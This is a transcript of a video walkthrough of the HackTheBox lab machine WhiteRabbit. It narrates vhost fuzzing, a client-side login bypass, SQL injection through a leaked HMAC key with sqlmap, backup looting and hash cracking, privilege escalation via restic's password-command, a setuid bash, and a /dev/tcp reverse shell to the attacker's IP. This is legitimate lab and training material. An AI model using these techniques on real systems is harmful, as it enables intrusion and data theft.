What's going on YouTube? This is Ipsec. I'm doing WhiteRabbit from HackTheBox, which starts out with finding an uptime Kuma instance, but we don't have any credentials. However, with some light recon, we discover a public status page that leads to other domain names. There's a wiki that talks about a webhook pipeline to GoPhish, and that signs the body of the request with HMAC to prevent any tampering. However, the signing key is leaked, so we can bypass the signing and find an SQL injection. It's a bit of a pain to do this manually in the repeater window because you have to keep changing the signature every request. But I try out Caido for this part since the workflow makes it pretty simple to automatically do this, and I mistakenly thought it was free, but I think my account was on some type of trial. Anyways, after we do this, we'll use Python to quickly create a proxy that makes it easy for other tools like SQLMap to exploit this. After all that, we'll exploit a restic backup service and also a custom password generator that is using a insecure seed. So with all that being said, let's just jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, SV enumerate versions, -vv for double for boost. This gives us things like the TTL, O8 output all formats, put in the nmap directory and call it WhiteRabbit, and then the IP address of 10.10.11.63. This can take some time to run, so I've already ran it. Looking at the results, we can see there are 3 ports open. The first one is SSH on port 22, and the banner tells us it's a Ubuntu server. We also have HTTP on port 80. Its TTL is 62, so one less than SSH, so this is probably going to be one hop away. And it's running the caddy HTTPD server, and it's directing us to whiterabbit.htb. So let's go ahead and add this to our host file. So we'll do a sudo v etc host, and then we can add, let's do 10.10.11.63, whiterabbit.htb, save that. And let's see what else we have. There is another SSH server on port 2222. The TTL is 62, so the same TTL as the caddy. And then we have a SSH banner, and we can see these are different. This is 3 Ubuntu 13.9. This is 3 Ubuntu 13.5. So this one is slightly out of date. The SSH host keys are also different, so we know this is definitely going to be a different SSH server. If I had to guess, this is probably going to be Docker because most of the time Dockers tend to be out of date compared to the main OS just because a lot of sysadmins like doing a apt update. And with Docker, you have to like re-pull it and things like that. So I'm just going to guess that is Docker. And the web server most likely going to be on the same containers, but doesn't really have to be. So once we get a shell on this, I'm going to like assume it's Docker and start enumerating the network. That's just what I'm thinking, right? So let's go ahead and take a look at the web server. So I'm going to go to HTTP whiterabbit.htb, and we get a page that just says penetration testing services. This is a single page website. So if I click any of the links, it just brings me down to where it is. And we have some stuff here. We have it using N8N. Maybe that's N8N. I forget how to pronounce that exactly. GoPhish, and then they have Uptime Kuma as well. So they're just talking about their services here. We could try seeing if there's a unique 404 page. We're just getting a completely blank response. Let's try a curl on this. That's probably going to be like typical of caddy, I'm guessing. It just responds with 404 and no data. We could also look at like what Wapalizer says and see if it identifies anything. So if we go here, look at the extension caddy, bootstrap, JS deliver, I'm guessing this is a static website. So my first guess is going to be trying to fuzz for virtual host. So I'm going to use fuff for this. We could use GoBuster, but I've just started using fuff more for it. So we can do HTTP whiterabbit.htb, and I have to fix that spelling. The header is going to be host : fuzz.whiterabbit.htb. And then the word list we're going to use is op, sec list, discovery, DNS. And I like using the subdomains, top, million. Let's do the 5,000. So hit enter. And then I'm going to the filter size for 0. We could probably filter status code for 302, but I like using size whenever possible. And we get a new domain, which is status. So let's go ahead and add this. So sudo v etc host. Then we can add status.whiterabbit. Man, I'm not typing that last T. HTTP, save that, close. And let's do HTTP status.whiterabbit.htb.com. And we get uptime Kuma. So if we try just logging in with like admin, we get nothing. We could go to the GitHub repo and see what it's coded in. But one thing I always like doing again is looking at what things are built with. And we see this is Vue.js. So like Vue, React's another one. A lot of these big front-end web frameworks, you can get a lot of information from just analyzing the web app itself because a lot of the processing is done on the client. So I'm going to intercept this and send it to Burp Suite, and we're going to see exactly what happens when we log in. So we click login. Did that not intercept? Let's do a full page refresh. And then let's see. It's trying to go to dashboard. Okay. I'm going to try admin, log in. We fail. So if I go to HTTP history, we just see dashboard, and then we switch over to WebSockets. If I look at the WebSocket history, let's go down. We probe 5. Here's our attempt to log in. And then we get a message back. It says, OK, false, incorrect username or password. So what I want to do is change this to true, and then we can see if we can just magically log in. Now, it won't just, like if we go to the server and they have everything implemented properly, we won't be able to do anything. But there's always a chance that there's some functionality that unauthorized users can do, and you just get a better feel of the website itself. So let's turn intercept on, log in, and then we're going to forward this login request. And let's see, here is the message. So let's do true here, forward, turn intercept off, and we can see the page, right? If I click on, let's see, settings, then we go to about, something flashes, and then it like goes away very quickly. If we try to do a lot of things, it'll probably like just say access not allowed. But if I turn intercept on, I can click on about, and we could get the exact version of Uptime Kuma. So if we wanted to now, we could go to like CVE details. Let's see, probably turn Burp Suite off so it goes a little bit quicker. And then we play around with Uptime Kuma, except Uptime Kuma. We got a few hits. And this is one of the things I don't like about it is you just kind of have to click around. We don't see anything in 2025. We could look at the cross-site scripting in 2023, but I think this version is newer than that. Here's another product here. Looking at this, let's see, we are 123, I want to say 16. Let's see, it's already timed us out. I want to say it was 16, so nothing here. Version 2.0 does have a vulnerability. So we can look at this, and there is a file disclosure. So maybe we want to look at it more in depth, but it's telling us we need a authenticated user. So chances are this isn't going to work. Maybe it doesn't work because this feature is new in 2.0 and 1.0. Additionally, this could just be requiring authentication. So I'm just going to keep this in mind, but let's go ahead and play around more. And I hate that this always brings us back to the login page after a couple seconds. So what I'm going to do is tell my Burp Suite to automatically match and replace it. So we have a WebSocket rule. I'm going to go from server to client, and we want to match OK false, and we're going to replace that with OK true. So now whenever Burp Suite sees that, it's just going to magically intercept it. So we should be able to play a little bit longer before it times us out. Let's switch back to Burp, refresh. Do we have intercept on? No, we don't. Okay, admin, magic happens, and now we get here. So we could click around and see what we have. A lot of these things kind of just disappear immediately. Again, there's probably a lot of just like access denied type of things. But if I click on status pages, we get an infinite load here. This is probably the same thing I'm talking about. Like we just don't have access to do something. So the page is broken. That is annoying. There we go. What request are you making? Get post. This is going to be a WebSocket thing, so we probably won't be able to see. If we click on new status page, it tells us the slug is /status, and this is going to be for monitors, right? If we're logged in, chances are we'd have pages here, but since we're not logged in, it doesn't really display any. However, we can try brute forcing a status page. So let's go ahead and try that. So we can go back to FUF and we can do status.whiterabbit.htb. And then we're going to do fuzz here. And again, we could use GoBuster to do a dir bust, but I already have this command, so might as well just do it this way, right? So let's see, discovery, we can do web content, raft small words dot text, and the URL is actually status fuzz, right? Because we want to fuzz any status pages. So do this, and there is a page called temp. So let's try accessing this. So we can just go WhiteRabbit status temp, and we get a dashboard. Awesome. So we have GoPhish, the N8N, the main website, and then wiki.js. So we have a few hosts here. So I'm just going to copy this. And then you guessed it, we're going to add it to our host file. So sudo v etc host. We can add that one. And what is this? We can also add this domain. Okay, save these. And let's go take a look at GoPhish. We have to actually do HTTP. There we go. And it wants us to sign in. I don't think there's a default credential for GoPhish. I think once you install it, it generates a credential for you. Let's check out the wiki to see if there's anything here. So I'm going to copy this, and then we'll go to this page as well. And the wiki is loading. Let's see. We have wiki.js. We have a to-do, add authentication in the wiki because it may have sensitive data. Let's see, if we click on browse, does anything happen? Page contents. Oh, here we go. It finally loaded. So we have GoPhish webhooks. So looking here, we can see, can I make this picture bigger? There we go. So this is going to be kind of a big, like what the webhook's doing, right? So it's going to look at a post request. It's going to check the GoPhish header. If there's no GoPhish header, it's going to go down here. And I think this is like fail, right? That's going to extract the signature. It's going to calculate an HMAC and then see if that HMAC is valid. If it's not valid, it's going to reject it. If it is valid, it's going to go up here to get the current phishing score. If it errors here, it's going to do some type of debug and stop. And then here it's going to check if the user exists in the database and then get us some information. So it's kind of hard to understand exactly what's going on, but maybe there's more documentation to clear this up, right? So here we go. We have documentation here. Maybe I should have just read this, but you kind of get the general point. So here's an example HTTP request, and it's going to go to this webhook and then this UUID. Here's the signature. And then we're testing this. So let's go ahead and copy this and let's see if it works. We probably have to add this host to our host file because I'm guessing this is a new host, or maybe that's the GoPhish one. A668. Nope, we don't have that because this is a 2.8. So we can save this. We don't need a FUF anymore. Let's see. Okay, I'm just going to make a request to this page. We will intercept it in Burp Suite. So intercept on, make a request, send the request to repeater, and then let's go ahead and disable that for now. Copy this, put this big thing in repeater window. So if I send this, do we get anything? We get user is not in the database. If we change this request up, we get provided signature is not valid. And again, if we go back to the workflow, we changed the body of the request. So the GoPhish signature is no longer valid and we get rejected. We don't keep on going, right? So we have to find out exactly how it is calculating this signature. So let's keep reading the wiki. And they have this GoPhish phishing score to database JSON file. So I'm going to go ahead and download this. And let's go ahead and move downloads GoPhish here. And if we cat it, let's see, we have a big JSON thing. And the main thing I want to grab, let's see, this all to me is noise. I kind of want to just see parameters and name, I think. So let's go ahead and cat this. Let's go JQ. We can go in nodes, right? Do I do a dot nodes? Okay. And then I want to grab the name and parameters. There we go. This looks better to me. So let's see. So on no signature, invalid signature, looking here, update phishing score on clicked event. And right here is important to notate, right? This query, it is going to be parameterized or prepared. I forget the exact wording, but we're putting a variable here and then doing the option query replace. So this is telling whatever SQL engine that is used that this is going to be a parameter, and that's going to prevent any type of SQL injection, right? You normally have SQL injection whenever the raw data is passed right in here. But if you tell it, hey, this is a variable and we're going to replace it, then SQL engines are normally smart enough. Sometimes the case is like with, I think, Node.js and type juggling or type confusion, but that's a different topic. So let's see. If clicked, this is just updating something, I think. Update phishing score. This looks fine. If submitted data. Okay. Success. Here is the debug. So I think this is just going to respond with an error message, right? So we respond text, the body is going to be the message, and we'll try to stringify the error message. Let's see, this is going to be check GoPhish header. And this is just checking if we have the XGoPhish signature. This is going to extract it. So we're going in the headers, looking at the GoPhish signature, and then splitting and grabbing it. And right here, we have a sensitive data leak. We have the secret potentially used to calculate the signature. So let's go ahead and we'll call this HMAC secret, I guess. Paste that in just so we have it and see what else we have. See current phishing score. I think this is going to be the query we are using. And it is doing a select star from victims where email, and it passes this just JSON body email in directly. So this is going to be SQL injectable, right? It's not the $1 and then doing a replace. This is just passing in raw data. So what we want to do is see if we can get some type of injection working here. So I'm going to go over to CyberChef because this is going to be, I think, the easiest way for us to validate how the secret is being generated. So let's just do CyberChef, and then I'm going to go over to Google. I think it's just cyberchef.io, right? This is it, this page. Come on, loading. Awesome. So let's grab this. We'll input this. And then let's see, do we have like a to.json? Well, let's just try HMACing first. So we can do HMAC, paste it in here. It's probably SHA-256 based upon the link they showed. And they say SHA-256. So let's go ahead and grab this HMAC secret. Copy this. Paste. And this gets BE21, and we should have a CF45. Now, we're giving it multiple lines of data, right? I bet if we change this, yes, the output does change. So one thing we could try is a JSON minify, and that's just going to make this JSON remove spaces and everything like that. So now if I delete things here, it's going to be the same. And this is probably how backend libraries are working, right? So this is D7, ends with 31A4, and this is CF. So this is not right. I actually expected this signature to match up. Let's see. UTF-8. There we go. So we're on the wrong type of key. We had hex, and this is definitely not hex. So now we have CF. If I take this minify off, you can see it definitely doesn't match. So always nice to just check before we do any type of coding. So now we have this. We could try putting a single quote in, right? So we do a single quote, this is going to be the output. So let's put a single quote, change the signature, send, and user not in the database. If we go back and look at this, it is using double quotes, right? Not single quotes. So let's go ahead and change this. I wonder, we may have to do a backslash. Let's try a backslash double quote. Like this. And if this doesn't work, then I'm going to get rid of the backslash. Escape characters are always weird. But here we go. Now we have a error message. Now, if we wanted to do this manually a bunch of times, this is a painful process, going to CyberChef, going here and editing it, right? I do not like that. I want to say if we had Burp Suite Pro, we could use custom actions. I also tried playing around a lot with like these Python scripts and maybe like creating a Python extension, but I kept running into problems. And then like I was thinking if I ever got this working, I'd always just have to go Google again, right? If you're curious where this Python script's coming from, it is a extension Python scripter. But I had a lot of trouble with this and I never ended up getting it working, but I didn't think it was a good thing just because it wouldn't benefit me in the long run. So this is where I switched over to Caido to see if it did something for free that Burp Suite didn't. And it does. So this is going to be the first video we actually show Caido, right? So I'm going to open up Caido. Come on. And I was thinking about using Caido for the whole video, but I ran into troubles doing WebSocket stuff with Caido. So neither tool is perfect, right? We have to create a project first. So I'm just going to create this project. We'll mark it as temporary and call it WhiteRabbit. And I'm also logged into Caido. That's one thing it's also particular about is creating an account and logging in. But let's get back to this. So we go to Intercept. Let's go to our browser. I want to do the same thing we did in Burp. Where do we want to go? Probably this URL. Let's go here, Burp, HTTP. There we go. So if we go to history, we have all the pages just like we do in Burp. But I'm going to press Control-R to go into the replay tab. It's the same thing as repeater. And we have pretty much the same thing. Instead of like, I think, Control space it's in Burp, or period, it's Control Enter to send the request. But we have the request. One thing that's nice is it does track the history. So I can always just go back in history. I wish Burp Suite did that because you can change the request, you can easily get back to it. We can rename this. So instead of 1, this is going to be fish request, maybe. Yeah, that seems fine. And then I want to go and grab this. We'll paste this, send, and user not in database. So Caido allows us to do a workflow. And like passive active, I wish I could get this working in the replay window, but for some reason it just wasn't working. Like I tried creating new workflow, and then in my mind, if I try to create a finding on everything, I should get a finding soon as it's ran. So that's what I was trying to do. Did I have to save that? There we go. There's passive. Let's go ahead and create one here. Create finding on active. And if this works, I'm going to be sad and we're going to have to try to play with these windows. That's enabled. That's enabled. So if I go to replay, send it, then we go to findings, we don't have anything. So I don't think those workflows actually work on this window. And I could be wrong with that because this is literally the first time running Caido. But if I click run in the workflow, we do have it creating a finding for us. But I think the workflows for that are mainly for if I want to point a program to use the proxy, then it can act it as it. But it does have this convert option, which I got to work with this. So if we go to this pane and we make the whole request, we can add a placeholder and we can give it a workflow, right? And I think the intent of this is to just be able to like highlight something, give it a workflow to base64 encode it, URL encode it, things like that. So every time we're editing the request, we don't highlight it, press Control U to URL encode it. We can just have Caido say, hey, do this in the background for us. However, if we create a new workflow, we'll be able to just automatically replace this SHA header or this SHA checksum with the value we want. So I'm going to go to Convert, New Workflow, and let's try this out. So we can add a node. And I'm going to first add one for JavaScript to get the body of the request. I wish there was a node that just had like get body, get header, but I couldn't find it. It's not that hard to create. So let's see. This is going to give us the full request. And now what we want to do is get the header and the body. So we're going to say parsed.split. And then we just want to do a regular expression for a double line break. And I'm doing it \r !n because this will match 0 or 1 times. So if it's just 2 \n's, it'll still match. So that's why I'm doing it that way. So we can do the same thing. And now we should have 2 variables, the header and the body actually split. Let's do max of 2. There we go. So now if I return the body or no string, we should be able to save. And then we want to put the input here because this is just going to let us test it. There we go. If I click run, workflow executed successfully. We look at the history. We can go here and see what it returned. So this is the data. And now we just returned the body. So this workflow is working as intended, right? So now what we want to do is go back into editor, and then we want to add a new node. And I'm going to run the JSON minify. It's nice that they have this option. We can pass it to this. And I'm also going to do a rename here, and I'm going to call this grab body. The alias is just going to be body. JSON minify, that's good. We want to grab the body to start. So now this is going to JSON minify the body. Let's do another node, more JavaScript. We're going to send that over here. And now this one is going to be sign. So we'll say sign HMAC. We'll call this HMAC, I guess. And let's see. So we will need to import crypto. So we can say import crypto from crypto. And that's going to give us the functionality to do the signing. I'm going to rename this parsed to just be message because that's going to be what we're signing. And then we want to create the key. So we'll do let key is equal to a string. And we'll go and grab the HMAC secret because that's going to be what the key is. Awesome. And now all we have to do is sign. So we'll do a const HMAC is equal to crypto create HMAC SHA-256 and the key. Then we want to give it the update, and that's going to be message. So that's going to be the data we are signing. And then what we want to get out of this is hex. So there we go. Now we can just return HMAC. And let's see, that is taking in JSON minify data, signing it. I think that is good. So I'm going to send this here. We'll save, run, missing reference, and convert end. So we just need to put something here. We'll do the HMAC run, and we get the data back. Awesome. So this has successfully signed it, right? We have this here, and the ending is this. Now, what we need to do, though, is have this replace the signature. So let's add another node. We can do a match and replace, and this is going to be a really bad way to do it. We probably should use like regular expression and like match a specific header, but this is the quick and dirty way. And sometimes that's all you need to do. So we want to do a match and replace against the start of the data. The search term we want is this, the original HMAC string, and we're going to replace it with a reference to the HMAC data. So now we go to convert end, and then that's going to be the matched replace. So we save, run, and here we go. We have the signature. So now if I do a single quote, hopefully the signature does change. It did. So now let's go back over to the replay tab. We have highlighted the whole thing. I press Control A. We go to workflow. We probably should name this better, right? We'll just do sign GoPhish, HMAC. Yeah, that should be fine. Replay, workflow, boom. From 0 to 397, so we match the whole thing. And now I can press Control Enter, user not in. Now we can put a, was it / double quote? Signature not valid. Uh-oh. That is not good. I swear this was working. What did we send? So we match this. Let's see. Oh, I did not click add. 099 add. This was working before I did my video. I wonder if there's some type of like limit of how many times we can do this. This is going to be really frustrating. Unlock the full potential. Yeah, we must be at the limit of workflows. Let's see, if I go back in, let's see, where is workflow? Is it because I did this stuff? Delete. Delete. Sign HMAC. Okay, so what I'm going to do is I'm going to create a new Caido account and we'll copy the workflow over to it. Is there like a export? View editor, import. I see import. Where's export? Fit view, zoom. I guess there's no way. Download. Awesome. Save that. So this really bothers me. No preprocessor. So yeah, I'm going to just use a different account and maybe it'll let me. Maybe there's only so many times you can use a workflow in a day on Caido free, which would be annoying. Okay, so I've now used a different email to log into Caido. Let's hope this works. So if I go to workflows, magically the workflow was still here. I did not actually expect that. I expected to have to import it, but I guess it saved in some profile, which kind of scares me because it may know I've just switched emails. If I go over to replay, we don't have any data here. So let's go back to this. We can copy, paste, and now let's go plus. Please have this unlocked. Workflow, sign, add. So that works now. I'm guessing maybe it's like time-based, which I really hate because I showed Caido because it allowed this for free. But maybe it's like the first couple days you have an email. But yeah, this was definitely behind some type of paywall, I think, last time, which super annoying. Let's see. We'll call it sign, I guess. So if I send this, let's see, Control Enter, send. We have to give it a URL. This, there we go. Does it send now? User not in database. That is what I expected. Let's do / double quote. There we go. So now it's just magically updating this. It doesn't show us in the actual pane, but it's letting us change things, which is cool. So if we wanted to, we could now use SQL injection here. And since we're getting it on an error message, it's probably going to be some type of error-based SQL injection. So let's try or extract value. This is going to be XPath. We'll do a new line. And then I want to say select version, open, close that, and then a comment, send it. And here we go. We have the version. So now we could just run any SQL query and we'd get the data here. So this is how you do it manually. But let's go ahead and switch this up and do this with a proxy, right? Because I want to run SQLMap to like automate this. I don't have any easy way to update the signature. I know SQLMap has like an eval thing, but that's really clunky. We could potentially write a tamper script, but again, I feel like it's clunky if we write tamper just to like do match and replace things. I like creating a like middleware proxy that we just point nmap to. It updates the variable for us, and I like doing it that way because we're writing something that's not for a tool specifically. We could point anything to it, right? We could also just go back to Burp Suite or anything else and set our middleware to be the upstream proxy of Burp Suite, and then we'll just edit the request for us. So this would work in anything, right? And we're going to use Python's man-the-middle proxy for this. So let's see. I'm going to make directory proxy. I think I kind of explained that poorly. Like my mind is still like blown that I literally ran through this Caido step this morning just to make sure I had it like how I wanted to explain it. And it worked just fine. As soon as I started recording the video is when like it decided to paywall me or something, which sucks. Let's see, new file, we'll say sign hmac.py. Yeah, create this file. So let's see, we will import HMAC. Let's give it the user bin environment Python 3. Let's see, we don't want that, that's fine. I don't need to update. Let's do import hashlib. And of course, I think Copilot has decided not to work. Let's see. Trust. Sure. I did JSON, so we can use like JSON minify, things like that. And we can say from man-the-middle proxy import HTTP. Okay. Let's do secret is equal to, and we got to give it the secret key. So we called that what? HMAC secret. We can copy this, paste it here. And let's see. We give it a request. And this may be fine. So we're looking at method is post. And the path, let's just say the path should start with, where is it here? Webhook. So this is going to intercept any request the proxy receives that is a post, and it has webhook in it. So here we go. We do body, flow, request, get text, signature, secret. I wonder if we have to JSON something here, because we're just doing body encode UTF-8. I am not sure. Let's do X, GoPhish, signature is equal to this. Let's see. SHA-256 is equal to like that. I think that's all we have to do. Let's put this in a try. Accept, exception. That should be fine. So if this doesn't work, then we'll know we have to update this, because we probably have to encode this in JSON so it becomes like minified. I'm guessing it's not going to work right away, but who knows? Let's see, we have the proxy here. So let's just do a MITM proxy. The script is going to be sign HMAC. The port let's do quad 8, mode regular. Okay. So let's see. How can we easily test this? I guess let's just run a SQLMap, right? So we can do SQLMap-u. We'll give it the URL. So that's going to be this, and then this. Okay. Then after URL, we probably need the method to be post. The data, it's going to be JSON. We can just copy this. I don't like that. Put it on all those lines. Let's see, I'm just going to add a space here to throw things off to make sure like it works easily. Maybe if I like had all this in minified form, it would just magically work, but I don't want it to work magically. So I'm going to like introduce some chaos by putting a few spaces in this JSON. Okay, the parameter is going to be email. We have to send the headers of content type, and this is going to be application JSON. The database was MySQL, and let's do batch. Let's see if this works. Oh, we didn't specify proxy. Let's do -- proxy is equal to HTTP 127.0.0.1 quad 8. So that's going to go through to this, and we have the request. If I look here, we should be able to see the headers. So this is the request. I don't know if it's sending the header, user agent host. I don't see like GoPhish. Response, no signature found. So we have something wrong in our proxy. So we killed the proxy. Let's go ahead and look at this. And I think I spotted the problem. It's probably not being intercepted because of this. We have request flow path is equal to this. We either want to put the full webhook in, or we could probably just change this to be like starts with. So if we do this, now this should hopefully start being intercepted. So let's go ahead and start the proxy back up. Let's go to SQLMap, run this, and we start seeing the flows. If we go in here, we can see, yes, we do have the signature added, but it is not valid. And that's probably because we didn't do those JSON steps, right? I have added a few spaces in the payload to make sure it induces that little bit of chaos. So let's see, let's go back to our code. And we have the body here. Let's do data is equal to JSON loads body. And then we can say, I'll call it payload, I guess. And we can say this is equal to JSON dumps the data, and the separators should be that. And then we want to encode. There we go. And now we should just be able to do payload. Okay. So this is doing essentially what that JSON minify was, hopefully. So let's go here, run this, go back to Python, look at it, response, and we have an error message. That is exactly what we want to see. So now we have our payload working, right? So we could have went to Caido or Burp Suite now and pointed at our proxy that we created, and then we'd have the same functionality we did with that whole workflow. I probably should have just shown this, knowing that it's probably behind a paywall, but live and learn. So now it's going to start brute forcing this, or not brute forcing, but just trying to find the exact type of SQL injection. What did we specify? We're not using technique, so we didn't tell it to do error-based injection, but that should be fine. I'm going to stop the video or pause the video, and we'll resume when this is done. Okay, so SQLMap is now finished, and we can see it found Boolean-based blind, error-based, stacked queries, and time-based. So let's go ahead and run this command again, and then I'm going to specify the --dbs, and that's going to just show me all the databases. So it's going to find information schema, phishing, and temp. So let's specify the phishing table, because it's probably going to be GoPhish. And I'm going to do --tables, so we can see all the tables in this. And we only have victims. I was kind of expecting to see like users so we could get credentials and crack them. But let's go ahead and specify the victims table, and then we will dump it. So looking at this, we have email, phishing score, and I guess int, but this doesn't seem to be that helpful. It's just saying like test2345@example.com and giving us a score. So let's see, test5@example.com. I wonder if I went here, test5example.com, send this. User's not in the database. It should be in the database, right? Maybe I'm not understanding this correctly. Okay, I'm not sure what's going on there, but it doesn't have any sensitive information. So let's go ahead and look at that temp table. So let's specify -d temp tables. And there's a command log. So let's go ahead and do the same thing. So do -t command log dump. And since there's only one table, we could probably just do database temp dump whatnot. But I'm just in the habit of always specifying exactly what I want, because a lot of times when I use SQLMap, it's doing something like Boolean-based queries and things that are very slow. And I just want to look at specific data, and I don't want it to take forever. So I'm just in the habit of always looking closely at what it's doing. So in this command log, we see uname-a. Then we have restic, which is a backup agent, not agent, but like backup service, init, the repo, and we have another host here. So I'm going to go ahead and add this to my host file. So sudo v etc host, and we can add that. And then we have this echo into the restic password. They delete the history, whatnot. And here they're going in home neo, opt neo password generator, and setting a password. But this looks like it is going to be the restic password, right? And we can kind of test this, or not by kind of test it, I mean just test it. I've installed restic already because we've done this before. Again, that I think machine was artificial. If you go to ipsec.rocks, hopefully I've updated it. Let's see, ipsec rocks. Let's turn intercept off, advanced, accept. And then let's see, what was this? Restic. There we go. We have registry and artificial. So you can look at these videos if you want to know more about restic. But here we're just going to use the CLI that I've installed. And I just did a sudo apt install restic is how I installed it. But let's see, we can say restic password is equal to this. And then the URL we want to put is here. So let's do restic rest at this. Do we have like a check? I think everything's fine. I think it actually looked. Let's do a snapshots, and this should show us what backups there are installed. And we have one path, dev shm bob ssh. So it looks like this has been backed up. So let's go back here and let's say restore the ID. And the target is where we want to restore it to. I'm just going to put it in the restic directory. There we go. If we go cd restic, we have dev shm bob ssh, and then we have a 7-zip file. So if you do 7-zip list bob7z, we have his public key and config. If we try to extract it, it wants a password. So let's run 7-zip to John on the zip file, and this gets us the hash. And we can send this over to Hashcat. So let's go ahead and copy this, sh over to the Kraken, which is another box on my network I do my cracking on. You can do it on anything. I just would recommend not doing it within a VM because it'll go extremely slow. But let's do v hashes, and this is WhiteRabbit dot, what is the thing we uncall it? I guess 7-zip. Put this in, and then let's do /hashcat, the word list, or the hashes, and now the word list. So opt word list rocku.txt. And let's see if it automatically detects this hash. If it does, then we're good. If not, then we just specify the mode. Let's see. Nothing found at all. I wonder if we have to add username. And I'm thinking that because the hash had the file name colon then the hash. So by adding the username, I think that may help it find it. It looks like it does. It is at least cracking now. Let's look at what mode it is on. 11600, which is 7-zip. So that looks good. And then is going to crack. Let's see. How long does it say? Rocku. Time estimate up to 31 minutes. It probably won't take that long. It should take probably under 5 minutes, I think, is most cracking on HackTheBox. So I'm just going to pause the video and let this run. And there we go. It took about 1 minute to run. And if I just do the --show, we should be able to see what the password was. It looks like it is pinklady1. So let's go ahead and get out of my box, and we can try to extract this. So 7zx bob.7zip, paste in the password. Was that my, looks like it was, data error and encrypted file. Doesn't look like that worked. Let's see. It's definitely saying pinklady1. Copy. Paste. Let's go back into the Kraken, and let's try editing a word list to remove pinklady1, and then try cracking it again, because I've definitely feel like I've had this happen before where Hashcat, like in the 7-zip specifically, it has some type of hash collision where it's not perfect and it gives you a bad password. So, shoot. Let's just go vrocku.txt. I just realized I did that in a backwards order because I was talking. So I'm just going to add rocku, the pinklady1, back in it. And rocku2 does not have pinklady, right? Rocku2. Let's do pinklady1 $. There we go. That should be end of line, right? So that should be it. So let's go back into root hashcat, and then we can say /hashcat username hashes WhiteRabbit opt word list rocku2.txt. And we also have to remove the hashcat.pot file, because this is going to be where it stores all the successful cracks. And if we didn't remove it, it wouldn't attempt to crack it. It would just automatically remove it because it thinks it knows the password. So hopefully this will help us. Let's see. There we go. It took a minute to crack last time. It's probably going to take a couple minutes now if it's going to work. So I'm going to pause the video and we will resume when this finishes. And around a minute yet again, that is surprising, it has cracked again. I'm going to be so upset when this says pinklady1. No, we get a keyboard walk. So we get a different hash. So let's go ahead and copy this. And then we're going to try 7-zip extract on this file again. And this time it's successfully extracted. So if we cat the config, we can see this is going to be port 2222, username is Bob, and we got public key and the private key. So if I cat pub.pub, we can see it's actually root at Lucy, which is a bit odd. And I guess they just renamed the file. We can also do it from the private key. A lot of times people get like a private key, they don't know what it goes to, and they just assume they can't find out. But this very end at the bottom of a private key is going to be the actual public key. So if we just do grep-v, and I'm going to do this to get rid of the line breaks, or not the line breaks, the dashes. So now if I do this, we just have base64. We can do base64-d, pipe it over to strings. And we also have the public key as well that says root at Lucy. Doesn't really mean anything. It doesn't really help you with this box. It's just interesting to me that the keys were generated for root at Lucy and then renamed to Bob. But let's do a chmod 600 on Bob so we can use this key. And then it is going to WhiteRabbit on port 222. So let's do ssh-i Bob WhiteRabbit.htb port quad 2. Yes, accept this. We need to specify Bob at this. And there we go. We get logged in. And this is going to be a Docker container most likely just based upon this host name. We can do lsla on /. There is a .dockerenv. If I do a sudo-l, we can see Bob can run restic as root. And I think it was the artificial machine. We showed there is a command injection vulnerability in this. I wonder if it's on GTFO bins. Let's do GTFO bins. We can see, I don't think it would be. Oh, maybe it is. Sudo. Let's see. Right here, they're not actually using the one we show. They're going to create a backup and then restore the backup over top of something. So essentially you can like create a cron job, back it up, restore that cron to like verspool cron root, and now that cron job will run and you get a shell. Or you can just like overwrite the passwd shadow whatever file. But restic also supports a command called password-command. Let's see. Let's do sudo restic-h password. There we go. So this is a shell command to obtain the repository password. So we can use this in order to get a shell, right? So we do sudo restic. Let's do password command, touch/temp ipsec, and then some command. I think I do check. It'll work. Do lsla on temp. We have ipsec owned by root. So what we can do is just, I'm going to copy bin bash over top of temp ipsec, and then let's do a chmod 4755 on temp ipsec. And this is going to give us a bash that has the set UID, so we can escalate to root, right? So temp ipsec -p, permission denied. What? Root. That's weird that didn't copy it over. Let's see. Bin bash over, let's do shell. No follow directory. Am I like missing what CP is? I wonder if it doesn't like the and. Temp. Okay, we got shell there. I don't think it likes chaining the commands. So I also do chmod 4755. And if we look at this now, it is a set UID file. So you can do temp shell -p. And now we are going to be root. And you may be asking, like, why not just make bin bash set UID, like do the chmod command on bin bash? And the main reason is any script that is just calling or execing shell may just magically become root, and that can break things on a system. Of course, it's also a security vulnerability. Doing it in temp is also a security vulnerability, but it's much cleaner to just remove it afterwards. But whenever doing the shell, I always like just copying bin bash and then moving it over. We could probably also do a reverse shell command. Maybe not. Maybe it's going to fail. Let's see. Where was my command? Let's try this real quick. I'm going to do a --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. Close out all the quotes. And let's go ahead and listen on 9001. So we could also do a reverse shell command like that. So there's a lot of things we could do. That reverse shell command is probably going to be the most secure way to do it. But this gives us a nice shell that is like fully compliant. We could do vim, whatever we want. So I like this. I was hoping if I did bash, it would return my shell to a normal way, but it doesn't. Let's go in root. And let's see, there is a public key called Morpheus. And now I'm starting to get like a matrix feel to this because we have WhiteRabbit and now Morpheus. If we cat morpheus.pub, we have the key name Morpheus at whiterabbit.htb. And I'm going to do the same thing with this key. So we'll do grep-v like this, backsplash like that, Morpheus base64-d strings. Strings actually not on this box. Okay. Let's go ahead and grab the key, copy it to a box. So I'm just going to call this Morpheus. I hope I spelled that correctly. And there's no line break at the end of this. Grep-v. And there's like SSH keygen. I think it's -k-y may do it. And it'll give you the public key. Let's see, base64-d strings. And the host name is FLX at blacklist. And this is actually the box author's username. So I'm guessing they just generated it on their machine and then copied it on over. I think it's SSH keygen, what did I say, -k-y? Does that work? Morpheus? No. What is that flag? Oh, it's probably -f instead of k. If we do f Morpheus -y, chmod 600 Morpheus. There we go. So now we get the public key this way. And it is the box creator. And we could look at their GitHub. And this is just something I always test for. Hopefully the box creator doesn't get mad at me for showing this, but it's not really a vulnerability because that's not their actual public key. But the reason why I'm testing for this is maybe Blacklist is the box, like their laptop, right? And this is their username to the laptop. So it's not unreasonable to think maybe they use this public key on GitHub itself. And GitHub lets us export all the public keys of a user. So we can go over to GitHub. So github.com and then their username, which is FLX0x00. So this can get us to their GitHub, right? And we could do a .keys after their username, and that gives us the public keys of SSH. And we look at this, it is NIST P256 SHA-2. It's going to be this. This begins with a bunch of A's, ends with LVZC, and it doesn't end the same. So this is not their key they used on GitHub, which is good. But I thought that was just interesting, right? So let's go ahead and use this key. So we can do sh-i Morpheus, and then let's do whiterabbit.htb. Let's see. We probably should spell the name. M-O-R, whoops. Morpheus. There we go. And there we go. We're on the host box now, and there is user.txt. If we do a sudo-l, it requires the password. We don't know 